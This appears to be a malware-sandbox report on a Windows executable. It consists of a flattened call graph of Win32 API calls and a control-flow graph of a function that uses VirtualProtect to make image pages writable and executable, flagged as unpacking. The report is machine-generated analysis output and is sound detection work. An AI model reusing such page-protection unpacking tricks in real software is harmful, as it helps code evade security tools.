5893 403198 4 API calls 5892->5893 5894 409311 5893->5894 5894->5698 5896 405198 19 API calls 5895->5896 5897 404ca2 5896->5897 5897->5698 5899 408dc8 5898->5899 5998 408c80 5899->5998 5903 4034f0 4 API calls 5902->5903 5904 406a6b 5903->5904 5905 406a82 GetEnvironmentVariableA 5904->5905 5909 406a95 5904->5909 5924 406dec 5904->5924 5905->5904 5906 406a8e 5905->5906 5907 403198 4 API calls 5906->5907 5907->5909 5909->5856 5919 406a34 5909->5919 5911 403414 5910->5911 5912 4068ab GetFullPathNameA 5911->5912 5913 4068b7 5912->5913 5914 4068ce 5912->5914 5913->5914 5915 4068bf 5913->5915 5916 40322c 4 API calls 5914->5916 5917 403278 4 API calls 5915->5917 5918 4068cc 5916->5918 5917->5918 5918->5867 5928 4069dc 5919->5928 5923 406ce9 5922->5923 5923->5860 5925 406dfa 5924->5925 5926 4034f0 4 API calls 5925->5926 5927 406e08 5926->5927 5927->5904 5935 406978 5928->5935 5930 4069fe 5931 406a06 GetFileAttributesA 5930->5931 5932 406a1b 5931->5932 5933 403198 4 API calls 5932->5933 5934 406a23 5933->5934 5934->5856 5945 406744 5935->5945 5937 4069b0 5940 4069c6 5937->5940 5941 4069bb 5937->5941 5939 406989 5939->5937 5952 406970 CharPrevA 5939->5952 5953 403454 5940->5953 5942 40322c 4 API calls 5941->5942 5944 4069c4 5942->5944 5944->5930 5948 406755 5945->5948 5946 4067b9 5947 406680 IsDBCSLeadByte 5946->5947 5949 4067b4 5946->5949 5947->5949 5948->5946 5950 406773 5948->5950 5949->5939 5950->5949 5960 406680 IsDBCSLeadByte 5950->5960 5952->5939 5954 403486 5953->5954 5955 403459 5953->5955 5956 403198 4 API calls 5954->5956 5955->5954 5958 40346d 5955->5958 5957 40347c 5956->5957 5957->5944 5959 403278 4 API calls 5958->5959 5959->5957 5961 406694 5960->5961 5961->5950 5963 403198 4 API calls 5962->5963 5966 4091d1 5963->5966 5967 4091fe 5966->5967 5979 4032a8 5966->5979 5982 403494 5966->5982 5968 403198 4 API calls 5967->5968 5969 409213 5968->5969 5969->5887 5986 408f70 5970->5986 5972 40904a 5973 40904e 5972->5973 5992 406a48 5972->5992 5973->5887 5976 409081 
5995 408fac 5976->5995 5980 403278 4 API calls 5979->5980 5981 4032b5 5980->5981 5981->5966 5983 403498 5982->5983 5985 4034c3 5982->5985 5984 4034f0 4 API calls 5983->5984 5984->5985 5985->5966 5987 408f7a 5986->5987 5988 408f7e 5986->5988 5987->5972 5989 408fa0 SetLastError 5988->5989 5990 408f87 Wow64DisableWow64FsRedirection 5988->5990 5991 408f9b 5989->5991 5990->5991 5991->5972 5993 4069dc 7 API calls 5992->5993 5994 406a52 GetLastError 5993->5994 5994->5976 5996 408fb1 Wow64RevertWow64FsRedirection 5995->5996 5997 408fbb 5995->5997 5996->5997 5997->5887 5999 403198 4 API calls 5998->5999 6005 408cb1 5998->6005 5999->6005 6000 408cdc 6001 4031b8 4 API calls 6000->6001 6003 408d69 6001->6003 6002 408cc8 6006 4032fc 4 API calls 6002->6006 6003->5698 6004 403278 4 API calls 6004->6005 6005->6000 6005->6002 6005->6004 6007 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6005->6007 6006->6000 6007->6005 6009 406744 IsDBCSLeadByte 6008->6009 6011 406835 6009->6011 6010 40687f 6010->5710 6011->6010 6012 406680 IsDBCSLeadByte 6011->6012 6012->6011 6014 4068f3 6013->6014 6015 406820 IsDBCSLeadByte 6014->6015 6017 4068fe 6015->6017 6016 4066ea 6016->5715 6016->5716 6017->6016 6018 406680 IsDBCSLeadByte 6017->6018 6018->6017 6020 406957 6019->6020 6021 40695b 6019->6021 6020->5729 6024 406970 CharPrevA 6021->6024 6023 40696c 6023->5729 6024->6023 6026 402bd5 RaiseException 6025->6026 6027 402be6 6025->6027 6026->6027 6027->5753 6280 402e64 6281 402e69 6280->6281 6282 402e7a RtlUnwind 6281->6282 6283 402e5e 6281->6283 6284 402e9d 6282->6284 6301 40667c IsDBCSLeadByte 6302 406694 6301->6302 6714 403f7d 6715 403fa2 6714->6715 6718 403f84 6714->6718 6717 403e8e 4 API calls 6715->6717 6715->6718 6716 403f8c 6717->6718 6718->6716 6719 402674 4 API calls 6718->6719 6720 403fca 6719->6720 6727 403d02 6734 403d12 6727->6734 6728 403ddf ExitProcess 6729 403db8 6731 403cc8 4 API calls 6729->6731 6730 403dea 6732 403dc2 6731->6732 6733 403cc8 4 API calls 6732->6733 6735 
403dcc 6733->6735 6734->6728 6734->6729 6734->6730 6734->6734 6737 403da4 6734->6737 6738 403d8f MessageBoxA 6734->6738 6747 4019dc 6735->6747 6743 403fe4 6737->6743 6738->6729 6740 403dd1 6740->6728 6740->6730 6744 403fe8 6743->6744 6745 403f07 4 API calls 6744->6745 6746 404006 6745->6746 6748 401abb 6747->6748 6749 4019ed 6747->6749 6748->6740 6750 401a04 RtlEnterCriticalSection 6749->6750 6751 401a0e LocalFree 6749->6751 6750->6751 6752 401a41 6751->6752 6753 401a2f VirtualFree 6752->6753 6754 401a49 6752->6754 6753->6752 6755 401a70 LocalFree 6754->6755 6756 401a87 6754->6756 6755->6755 6755->6756 6757 401aa9 RtlDeleteCriticalSection 6756->6757 6758 401a9f RtlLeaveCriticalSection 6756->6758 6757->6740 6758->6757 6311 404206 6312 4041cc 6311->6312 6315 40420a 6311->6315 6313 404282 6314 403154 4 API calls 6316 404323 6314->6316 6315->6313 6315->6314 6317 402c08 6320 402c82 6317->6320 6321 402c19 6317->6321 6318 402c56 RtlUnwind 6319 403154 4 API calls 6318->6319 6319->6320 6321->6318 6321->6320 6324 402b28 6321->6324 6325 402b31 RaiseException 6324->6325 6326 402b47 6324->6326 6325->6326 6326->6318 6327 408c10 6328 408c17 6327->6328 6329 403198 4 API calls 6328->6329 6337 408cb1 6329->6337 6330 408cdc 6331 4031b8 4 API calls 6330->6331 6333 408d69 6331->6333 6332 408cc8 6335 4032fc 4 API calls 6332->6335 6334 403278 4 API calls 6334->6337 6335->6330 6336 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6336->6337 6337->6330 6337->6332 6337->6334 6337->6336 6338 40a011 6339 40a036 6338->6339 6340 407918 InterlockedExchange 6339->6340 6342 40a060 6340->6342 6341 40a070 6348 4076ac SetEndOfFile 6341->6348 6342->6341 6343 409aa0 4 API calls 6342->6343 6343->6341 6345 40a08c 6346 4025ac 4 API calls 6345->6346 6347 40a0c3 6346->6347 6349 4076c3 6348->6349 6350 4076bc 6348->6350 6349->6345 6351 40748c 21 API calls 6350->6351 6351->6349 6763 409916 6764 409918 6763->6764 6765 40993a 6764->6765 6766 409956 CallWindowProcA 6764->6766 6766->6765 6079 407017 6080 
407008 SetErrorMode 6079->6080 6356 403018 6357 403070 6356->6357 6358 403025 6356->6358 6359 40302a RtlUnwind 6358->6359 6360 40304e 6359->6360 6362 402f78 6360->6362 6363 402be8 6360->6363 6364 402bf1 RaiseException 6363->6364 6365 402c04 6363->6365 6364->6365 6365->6357 6773 409918 6774 409927 6773->6774 6775 40993a 6773->6775 6774->6775 6776 409956 CallWindowProcA 6774->6776 6776->6775 6370 40901e 6371 409010 6370->6371 6372 408fac Wow64RevertWow64FsRedirection 6371->6372 6373 409018 6372->6373 6374 409020 SetLastError 6375 409029 6374->6375 6386 403a28 ReadFile 6387 403a46 6386->6387 6388 403a49 GetLastError 6386->6388 6217 40762c ReadFile 6218 407663 6217->6218 6219 40764c 6217->6219 6220 407652 GetLastError 6219->6220 6221 40765c 6219->6221 6220->6218 6220->6221 6222 40748c 21 API calls 6221->6222 6222->6218 6393 40a02c 6394 409aa0 4 API calls 6393->6394 6395 40a031 6394->6395 6396 40a036 6395->6396 6397 402f24 5 API calls 6395->6397 6398 407918 InterlockedExchange 6396->6398 6397->6396 6399 40a060 6398->6399 6400 40a070 6399->6400 6401 409aa0 4 API calls 6399->6401 6402 4076ac 22 API calls 6400->6402 6401->6400 6403 40a08c 6402->6403 6404 4025ac 4 API calls 6403->6404 6405 40a0c3 6404->6405 6777 40712e 6778 407118 6777->6778 6779 403198 4 API calls 6778->6779 6780 407120 6779->6780 6781 403198 4 API calls 6780->6781 6782 407128 6781->6782 6783 408f30 6786 408dfc 6783->6786 6787 408e05 6786->6787 6788 403198 4 API calls 6787->6788 6789 408e13 6787->6789 6788->6787 6790 403932 6791 403924 6790->6791 6794 40374c 6791->6794 6793 40392c 6795 403766 6794->6795 6796 403759 6794->6796 6795->6793 6796->6795 6797 403779 VariantClear 6796->6797 6797->6793 6028 4075c4 SetFilePointer 6029 4075f7 6028->6029 6030 4075e7 GetLastError 6028->6030 6030->6029 6031 4075f0 6030->6031 6032 40748c 21 API calls 6031->6032 6032->6029 6406 405ac4 6407 405acc 6406->6407 6411 405ad4 6406->6411 6408 405ad2 6407->6408 6409 405adb 6407->6409 6413 405a3c 6408->6413 6410 405930 5 API calls 
6409->6410 6410->6411 6420 405a44 6413->6420 6414 405a5e 6416 405a63 6414->6416 6417 405a7a 6414->6417 6415 403154 4 API calls 6415->6420 6418 405930 5 API calls 6416->6418 6419 403154 4 API calls 6417->6419 6421 405a76 6418->6421 6422 405a7f 6419->6422 6420->6414 6420->6415 6424 403154 4 API calls 6421->6424 6423 4059a0 19 API calls 6422->6423 6423->6421 6425 405aa8 6424->6425 6426 403154 4 API calls 6425->6426 6427 405ab6 6426->6427 6427->6411 6428 4076c8 WriteFile 6429 4076e8 6428->6429 6430 4076ef 6428->6430 6431 40748c 21 API calls 6429->6431 6432 407700 6430->6432 6433 4073ec 20 API calls 6430->6433 6431->6430 6433->6432 6434 40a2ca 6443 4096fc 6434->6443 6437 402f24 5 API calls 6438 40a2d4 6437->6438 6439 403198 4 API calls 6438->6439 6440 40a2f3 6439->6440 6441 403198 4 API calls 6440->6441 6442 40a2fb 6441->6442 6452 40569c 6443->6452 6445 409717 6447 409745 6445->6447 6458 40720c 6445->6458 6449 403198 4 API calls 6447->6449 6448 409735 6451 40973d MessageBoxA 6448->6451 6450 40975a 6449->6450 6450->6437 6451->6447 6453 403154 4 API calls 6452->6453 6454 4056a1 6453->6454 6455 4056b9 6454->6455 6456 403154 4 API calls 6454->6456 6455->6445 6457 4056af 6456->6457 6457->6445 6459 40569c 4 API calls 6458->6459 6460 40721b 6459->6460 6461 407221 6460->6461 6462 40722f 6460->6462 6463 40322c 4 API calls 6461->6463 6464 40723f 6462->6464 6466 40724b 6462->6466 6467 40722d 6463->6467 6469 4071d0 6464->6469 6476 4032b8 6466->6476 6467->6448 6470 40322c 4 API calls 6469->6470 6471 4071df 6470->6471 6472 4071fc 6471->6472 6473 406950 CharPrevA 6471->6473 6472->6467 6474 4071eb 6473->6474 6474->6472 6475 4032fc 4 API calls 6474->6475 6475->6472 6477 403278 4 API calls 6476->6477 6478 4032c2 6477->6478 6478->6467 6479 402ccc 6480 402cdd 6479->6480 6484 402cfe 6479->6484 6481 402d88 RtlUnwind 6480->6481 6483 402b28 RaiseException 6480->6483 6480->6484 6482 403154 4 API calls 6481->6482 6482->6484 6485 402d7f 6483->6485 6485->6481 6806 403fcd 6807 403f07 4 API calls 
6806->6807 6808 403fd6 6807->6808 6809 403e9c 4 API calls 6808->6809 6810 403fe2 6809->6810 5464 4024d0 5465 4024e4 5464->5465 5466 4024f7 5464->5466 5503 401918 RtlInitializeCriticalSection 5465->5503 5468 402518 5466->5468 5469 40250e RtlEnterCriticalSection 5466->5469 5480 402300 5468->5480 5469->5468 5472 4024ed 5474 402525 5477 402581 5474->5477 5478 402577 RtlLeaveCriticalSection 5474->5478 5476 402531 5476->5474 5510 40215c 5476->5510 5478->5477 5481 402314 5480->5481 5482 402335 5481->5482 5483 4023b8 5481->5483 5485 402344 5482->5485 5524 401b74 5482->5524 5483->5485 5488 402455 5483->5488 5527 401d80 5483->5527 5535 401e84 5483->5535 5485->5474 5490 401fd4 5485->5490 5488->5485 5531 401d00 5488->5531 5491 401fe8 5490->5491 5492 401ffb 5490->5492 5493 401918 4 API calls 5491->5493 5494 402012 RtlEnterCriticalSection 5492->5494 5497 40201c 5492->5497 5495 401fed 5493->5495 5494->5497 5495->5492 5496 401ff1 5495->5496 5500 402052 5496->5500 5497->5500 5617 401ee0 5497->5617 5500->5476 5501 402147 5501->5476 5502 40213d RtlLeaveCriticalSection 5502->5501 5504 40193c RtlEnterCriticalSection 5503->5504 5505 401946 5503->5505 5504->5505 5506 401964 LocalAlloc 5505->5506 5507 40197e 5506->5507 5508 4019c3 RtlLeaveCriticalSection 5507->5508 5509 4019cd 5507->5509 5508->5509 5509->5466 5509->5472 5511 40217a 5510->5511 5512 402175 5510->5512 5513 4021ab RtlEnterCriticalSection 5511->5513 5516 4021b5 5511->5516 5520 40217e 5511->5520 5514 401918 4 API calls 5512->5514 5513->5516 5514->5511 5515 4021c1 5518 4022e3 RtlLeaveCriticalSection 5515->5518 5519 4022ed 5515->5519 5516->5515 5517 402244 5516->5517 5522 402270 5516->5522 5517->5520 5521 401d80 7 API calls 5517->5521 5518->5519 5519->5474 5520->5474 5521->5520 5522->5515 5523 401d00 7 API calls 5522->5523 5523->5515 5525 40215c 9 API calls 5524->5525 5526 401b95 5525->5526 5526->5485 5528 401d92 5527->5528 5529 401d89 5527->5529 5528->5483 5529->5528 5530 401b74 9 API calls 5529->5530 5530->5528 5532 401d1e 
5531->5532 5533 401d4e 5531->5533 5532->5485 5533->5532 5540 401c68 5533->5540 5595 401768 5535->5595 5537 401e99 5538 401ea6 5537->5538 5606 401dcc 5537->5606 5538->5483 5541 401c7a 5540->5541 5542 401c9d 5541->5542 5543 401caf 5541->5543 5553 40188c 5542->5553 5544 40188c 3 API calls 5543->5544 5546 401cad 5544->5546 5547 401cc5 5546->5547 5563 401b44 5546->5563 5547->5532 5549 401cd4 5550 401cee 5549->5550 5568 401b98 5549->5568 5573 4013a0 5550->5573 5554 4018b2 5553->5554 5562 40190b 5553->5562 5577 401658 5554->5577 5559 4018e6 5561 4013a0 LocalAlloc 5559->5561 5559->5562 5561->5562 5562->5546 5564 401b61 5563->5564 5565 401b52 5563->5565 5564->5549 5566 401d00 9 API calls 5565->5566 5567 401b5f 5566->5567 5567->5549 5569 401bab 5568->5569 5570 401b9d 5568->5570 5569->5550 5571 401b74 9 API calls 5570->5571 5572 401baa 5571->5572 5572->5550 5574 4013ab 5573->5574 5575 4013c6 5574->5575 5576 4012e4 LocalAlloc 5574->5576 5575->5547 5576->5575 5579 40168f 5577->5579 5578 4016cf 5581 40132c 5578->5581 5579->5578 5580 4016a9 VirtualFree 5579->5580 5580->5579 5582 401348 5581->5582 5589 4012e4 5582->5589 5585 40150c 5587 40153b 5585->5587 5586 401594 5586->5559 5587->5586 5588 401568 VirtualFree 5587->5588 5588->5587 5592 40128c 5589->5592 5593 401298 LocalAlloc 5592->5593 5594 4012aa 5592->5594 5593->5594 5594->5559 5594->5585 5596 401787 5595->5596 5597 40183b 5596->5597 5598 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5596->5598 5600 40132c LocalAlloc 5596->5600 5601 401821 5596->5601 5602 4017d6 5596->5602 5603 4017e7 5597->5603 5613 4015c4 5597->5613 5598->5596 5600->5596 5604 40150c VirtualFree 5601->5604 5605 40150c VirtualFree 5602->5605 5603->5537 5604->5603 5605->5603 5607 401d80 9 API calls 5606->5607 5608 401de0 5607->5608 5609 40132c LocalAlloc 5608->5609 5610 401df0 5609->5610 5611 401b44 9 API calls 5610->5611 5612 401df8 5610->5612 5611->5612 5612->5538 5614 40160a 5613->5614 5615 401626 VirtualAlloc 5614->5615 5616 40163a 5614->5616 
5615->5614 5615->5616 5616->5603 5621 401ef0 5617->5621 5618 401f1c 5619 401d00 9 API calls 5618->5619 5622 401f40 5618->5622 5619->5622 5621->5618 5621->5622 5623 401e58 5621->5623 5622->5501 5622->5502 5628 4016d8 5623->5628 5626 401dcc 9 API calls 5627 401e75 5626->5627 5627->5621 5632 4016f4 5628->5632 5630 4016fe 5631 4015c4 VirtualAlloc 5630->5631 5636 40170a 5631->5636 5632->5630 5633 40175b 5632->5633 5634 40132c LocalAlloc 5632->5634 5635 40174f 5632->5635 5638 401430 5632->5638 5633->5626 5633->5627 5634->5632 5637 40150c VirtualFree 5635->5637 5636->5633 5637->5633 5639 40143f VirtualAlloc 5638->5639 5641 40146c 5639->5641 5642 40148f 5639->5642 5643 4012e4 LocalAlloc 5641->5643 5642->5632 5644 401478 5643->5644 5644->5642 5645 40147c VirtualFree 5644->5645 5645->5642 6486 4028d2 6487 4028da 6486->6487 6488 403554 4 API calls 6487->6488 6489 4028ef 6487->6489 6488->6487 6490 4025ac 4 API calls 6489->6490 6491 4028f4 6490->6491 6811 4019d3 6812 4019ba 6811->6812 6813 4019c3 RtlLeaveCriticalSection 6812->6813 6814 4019cd 6812->6814 6813->6814 6033 407fd4 6034 407fe6 6033->6034 6036 407fed 6033->6036 6044 407f10 6034->6044 6037 408021 6036->6037 6039 408015 6036->6039 6040 408017 6036->6040 6038 40804e 6037->6038 6041 407d7c 19 API calls 6037->6041 6058 407e2c 6039->6058 6055 407d7c 6040->6055 6041->6038 6045 407f25 6044->6045 6046 407d7c 19 API calls 6045->6046 6047 407f34 6045->6047 6046->6047 6048 407f6e 6047->6048 6049 407d7c 19 API calls 6047->6049 6050 407f82 6048->6050 6051 407d7c 19 API calls 6048->6051 6049->6048 6054 407fae 6050->6054 6065 407eb8 6050->6065 6051->6050 6054->6036 6068 4058b4 6055->6068 6057 407d9e 6057->6037 6059 405184 19 API calls 6058->6059 6060 407e57 6059->6060 6076 407de4 6060->6076 6062 407e5f 6063 403198 4 API calls 6062->6063 6064 407e74 6063->6064 6064->6037 6066 407ec7 VirtualFree 6065->6066 6067 407ed9 VirtualAlloc 6065->6067 6066->6067 6067->6054 6069 4058c0 6068->6069 6070 405184 19 API calls 6069->6070 6071 4058ed 
6070->6071 6072 4031e8 4 API calls 6071->6072 6073 4058f8 6072->6073 6074 403198 4 API calls 6073->6074 6075 40590d 6074->6075 6075->6057 6077 4058b4 19 API calls 6076->6077 6078 407e06 6077->6078 6078->6062 6496 40a0d5 6497 40a105 6496->6497 6498 40a10f CreateWindowExA SetWindowLongA 6497->6498 6499 405184 19 API calls 6498->6499 6500 40a192 6499->6500 6501 4032fc 4 API calls 6500->6501 6502 40a1a0 6501->6502 6503 4032fc 4 API calls 6502->6503 6504 40a1ad 6503->6504 6505 406b7c 5 API calls 6504->6505 6506 40a1b9 6505->6506 6507 4032fc 4 API calls 6506->6507 6508 40a1c2 6507->6508 6509 4099a4 29 API calls 6508->6509 6510 40a1d4 6509->6510 6511 409884 5 API calls 6510->6511 6512 40a1e7 6510->6512 6511->6512 6513 40a220 6512->6513 6514 4094d8 9 API calls 6512->6514 6515 40a239 6513->6515 6518 40a233 RemoveDirectoryA 6513->6518 6514->6513 6516 40a242 73A25CF0 6515->6516 6517 40a24d 6515->6517 6516->6517 6519 40a275 6517->6519 6520 40357c 4 API calls 6517->6520 6518->6515 6521 40a26b 6520->6521 6522 4025ac 4 API calls 6521->6522 6522->6519 6081 40a0e7 6082 40a0eb SetLastError 6081->6082 6113 409648 GetLastError 6082->6113 6085 40a105 6087 40a10f CreateWindowExA SetWindowLongA 6085->6087 6086 402f24 5 API calls 6086->6085 6088 405184 19 API calls 6087->6088 6089 40a192 6088->6089 6090 4032fc 4 API calls 6089->6090 6091 40a1a0 6090->6091 6092 4032fc 4 API calls 6091->6092 6093 40a1ad 6092->6093 6126 406b7c GetCommandLineA 6093->6126 6096 4032fc 4 API calls 6097 40a1c2 6096->6097 6131 4099a4 6097->6131 6100 409884 5 API calls 6101 40a1e7 6100->6101 6102 40a220 6101->6102 6103 40a207 6101->6103 6105 40a239 6102->6105 6108 40a233 RemoveDirectoryA 6102->6108 6147 4094d8 6103->6147 6106 40a242 73A25CF0 6105->6106 6107 40a24d 6105->6107 6106->6107 6109 40a275 6107->6109 6155 40357c 6107->6155 6108->6105 6111 40a26b 6112 4025ac 4 API calls 6111->6112 6112->6109 6114 404c84 19 API calls 6113->6114 6115 40968f 6114->6115 6116 407284 5 API calls 6115->6116 6117 40969f 6116->6117 
6118 408da8 4 API calls 6117->6118 6119 4096b4 6118->6119 6120 405880 4 API calls 6119->6120 6121 4096c3 6120->6121 6122 4031b8 4 API calls 6121->6122 6123 4096e2 6122->6123 6124 403198 4 API calls 6123->6124 6125 4096ea 6124->6125 6125->6085 6125->6086 6127 406af0 4 API calls 6126->6127 6128 406ba1 6127->6128 6129 403198 4 API calls 6128->6129 6130 406bbf 6129->6130 6130->6096 6132 4033b4 4 API calls 6131->6132 6133 4099df 6132->6133 6134 409a11 CreateProcessA 6133->6134 6135 409a24 CloseHandle 6134->6135 6136 409a1d 6134->6136 6138 409a2d 6135->6138 6137 409648 21 API calls 6136->6137 6137->6135 6168 409978 6138->6168 6141 409a49 6142 409978 3 API calls 6141->6142 6143 409a4e GetExitCodeProcess CloseHandle 6142->6143 6144 409a6e 6143->6144 6145 403198 4 API calls 6144->6145 6146 409a76 6145->6146 6146->6100 6146->6101 6148 409532 6147->6148 6149 4094eb 6147->6149 6148->6102 6149->6148 6150 4094f3 Sleep 6149->6150 6151 409503 Sleep 6149->6151 6153 40951a GetLastError 6149->6153 6172 408fbc 6149->6172 6150->6149 6151->6149 6153->6148 6154 409524 GetLastError 6153->6154 6154->6148 6154->6149 6156 403591 6155->6156 6164 4035a0 6155->6164 6160 4035d0 6156->6160 6161 40359b 6156->6161 6163 4035b6 6156->6163 6157 4035b1 6162 403198 4 API calls 6157->6162 6158 4035b8 6159 4031b8 4 API calls 6158->6159 6159->6163 6160->6163 6166 40357c 4 API calls 6160->6166 6161->6164 6165 4035ec 6161->6165 6162->6163 6163->6111 6164->6157 6164->6158 6165->6163 6180 403554 6165->6180 6166->6160 6169 40998c PeekMessageA 6168->6169 6170 409980 TranslateMessage DispatchMessageA 6169->6170 6171 40999e MsgWaitForMultipleObjects 6169->6171 6170->6169 6171->6138 6171->6141 6173 408f70 2 API calls 6172->6173 6174 408fd2 6173->6174 6175 408fd6 6174->6175 6176 408ff2 DeleteFileA GetLastError 6174->6176 6175->6149 6177 409010 6176->6177 6178 408fac Wow64RevertWow64FsRedirection 6177->6178 6179 409018 6178->6179 6179->6149 6181 403566 6180->6181 6183 403578 6181->6183 6184 403604 6181->6184 
6183->6165 6185 40357c 6184->6185 6186 4035a0 6185->6186 6190 4035d0 6185->6190 6191 40359b 6185->6191 6193 4035b6 6185->6193 6187 4035b1 6186->6187 6188 4035b8 6186->6188 6192 403198 4 API calls 6187->6192 6189 4031b8 4 API calls 6188->6189 6189->6193 6190->6193 6195 40357c 4 API calls 6190->6195 6191->6186 6194 4035ec 6191->6194 6192->6193 6193->6181 6194->6193 6196 403554 4 API calls 6194->6196 6195->6190 6196->6194 6818 402be9 RaiseException 6819 402c04 6818->6819 6529 402af2 6530 402afe 6529->6530 6533 402ed0 6530->6533 6534 403154 4 API calls 6533->6534 6536 402ee0 6534->6536 6535 402b03 6536->6535 6538 402b0c 6536->6538 6539 402b25 6538->6539 6540 402b15 RaiseException 6538->6540 6539->6535 6540->6539 6820 402dfa 6821 402e26 6820->6821 6822 402e0d 6820->6822 6824 402ba4 6822->6824 6825 402bc9 6824->6825 6826 402bad 6824->6826 6825->6821 6827 402bb5 RaiseException 6826->6827 6827->6825 6828 4075fa GetFileSize 6829 407626 6828->6829 6830 407616 GetLastError 6828->6830 6830->6829 6831 40761f 6830->6831 6832 40748c 21 API calls 6831->6832 6832->6829 6833 406ffb 6834 407008 SetErrorMode 6833->6834 6545 403a80 CloseHandle 6546 403a90 6545->6546 6547 403a91 GetLastError 6545->6547 6548 40a282 6549 40a1f4 6548->6549 6550 40a220 6549->6550 6551 4094d8 9 API calls 6549->6551 6552 40a239 6550->6552 6555 40a233 RemoveDirectoryA 6550->6555 6551->6550 6553 40a242 73A25CF0 6552->6553 6554 40a24d 6552->6554 6553->6554 6556 40a275 6554->6556 6557 40357c 4 API calls 6554->6557 6555->6552 6558 40a26b 6557->6558 6559 4025ac 4 API calls 6558->6559 6559->6556 6560 404283 6561 4042c3 6560->6561 6562 403154 4 API calls 6561->6562 6563 404323 6562->6563 6835 404185 6836 4041ff 6835->6836 6837 4041cc 6836->6837 6838 403154 4 API calls 6836->6838 6839 404323 6838->6839 6564 40a287 6565 40a290 6564->6565 6567 40a2bb 6564->6567 6574 409448 6565->6574 6569 403198 4 API calls 6567->6569 6568 40a295 6568->6567 6571 40a2b3 MessageBoxA 6568->6571 6570 40a2f3 6569->6570 6572 403198 4 API 
calls 6570->6572 6571->6567 6573 40a2fb 6572->6573 6575 409454 GetCurrentProcess OpenProcessToken 6574->6575 6576 4094af ExitWindowsEx 6574->6576 6577 409466 6575->6577 6578 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6575->6578 6576->6577 6577->6568 6578->6576 6578->6577 6579 403e87 6581 403e4c 6579->6581 6580 403e67 6586 403e78 6580->6586 6592 402674 6580->6592 6581->6580 6582 403e62 6581->6582 6583 403e7b 6581->6583 6588 403cc8 6582->6588 6585 402674 4 API calls 6583->6585 6585->6586 6589 403cd6 6588->6589 6590 402674 4 API calls 6589->6590 6591 403ceb 6589->6591 6590->6591 6591->6580 6593 403154 4 API calls 6592->6593 6594 40267a 6593->6594 6594->6586 6599 407e90 6600 407eb8 VirtualFree 6599->6600 6601 407e9d 6600->6601 6848 403991 6849 403983 6848->6849 6850 40374c VariantClear 6849->6850 6851 40398b 6850->6851 6852 405b92 6854 405b94 6852->6854 6853 405bd0 6857 405930 5 API calls 6853->6857 6854->6853 6855 405be7 6854->6855 6856 405bca 6854->6856 6861 404ccc 5 API calls 6855->6861 6856->6853 6858 405c3c 6856->6858 6859 405be3 6857->6859 6860 4059a0 19 API calls 6858->6860 6862 403198 4 API calls 6859->6862 6860->6859 6863 405c10 6861->6863 6864 405c76 6862->6864 6865 4059a0 19 API calls 6863->6865 6865->6859 6604 403e95 6605 403e4c 6604->6605 6606 403e62 6605->6606 6607 403e7b 6605->6607 6610 403e67 6605->6610 6608 403cc8 4 API calls 6606->6608 6609 402674 4 API calls 6607->6609 6608->6610 6611 403e78 6609->6611 6610->6611 6612 402674 4 API calls 6610->6612 6612->6611 6613 403a97 6614 403aac 6613->6614 6615 403bbc GetStdHandle 6614->6615 6616 403b0e CreateFileA 6614->6616 6626 403ab2 6614->6626 6617 403c17 GetLastError 6615->6617 6621 403bba 6615->6621 6616->6617 6618 403b2c 6616->6618 6617->6626 6620 403b3b GetFileSize 6618->6620 6618->6621 6620->6617 6622 403b4e SetFilePointer 6620->6622 6623 403be7 GetFileType 6621->6623 6621->6626 6622->6617 6627 403b6a ReadFile 6622->6627 6625 403c02 CloseHandle 6623->6625 6623->6626 6625->6626 
6627->6617 6628 403b8c 6627->6628 6628->6621 6629 403b9f SetFilePointer 6628->6629 6629->6617 6630 403bb0 SetEndOfFile 6629->6630 6630->6617 6630->6621 6884 4011aa 6885 4011ac GetStdHandle 6884->6885 6223 4076ac SetEndOfFile 6224 4076c3 6223->6224 6225 4076bc 6223->6225 6226 40748c 21 API calls 6225->6226 6226->6224 6634 4028ac 6635 402594 4 API calls 6634->6635 6636 4028b6 6635->6636 6637 401ab9 6638 401a96 6637->6638 6639 401aa9 RtlDeleteCriticalSection 6638->6639 6640 401a9f RtlLeaveCriticalSection 6638->6640 6640->6639

Control-flow Graph

[Control-flow graph of the function at 00409B30 (basic blocks 409b30-409beb); the executed/not-executed colouring of the rendered graph is not reproduced. Per the graph: the entry block calls GetSystemInfo and VirtualQuery on 00400000, then a loop issues VirtualQuery over successive regions; for regions that pass the checks at 409b65-409b82 it calls VirtualProtect, repeatedly calls a helper at 409b28, optionally calls VirtualProtect a second time, and continues with the next VirtualQuery. In the APIs below, 0000001C is sizeof(MEMORY_BASIC_INFORMATION) on 32-bit Windows and 00000040 is PAGE_EXECUTE_READWRITE, i.e. the loop makes pages of the loaded image writable and executable, which is the behaviour behind the "Detected unpacking (changes PE section rights)" signature.]

APIs
• GetSystemInfo.KERNEL32(?), ref: 00409B42
• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
• VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
Memory Dump Source
• Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Virtual$ProtectQuery$InfoSystem
• String ID:
• API String ID: 2441996862-0
• Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
• Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
• Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
• Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                              APIs
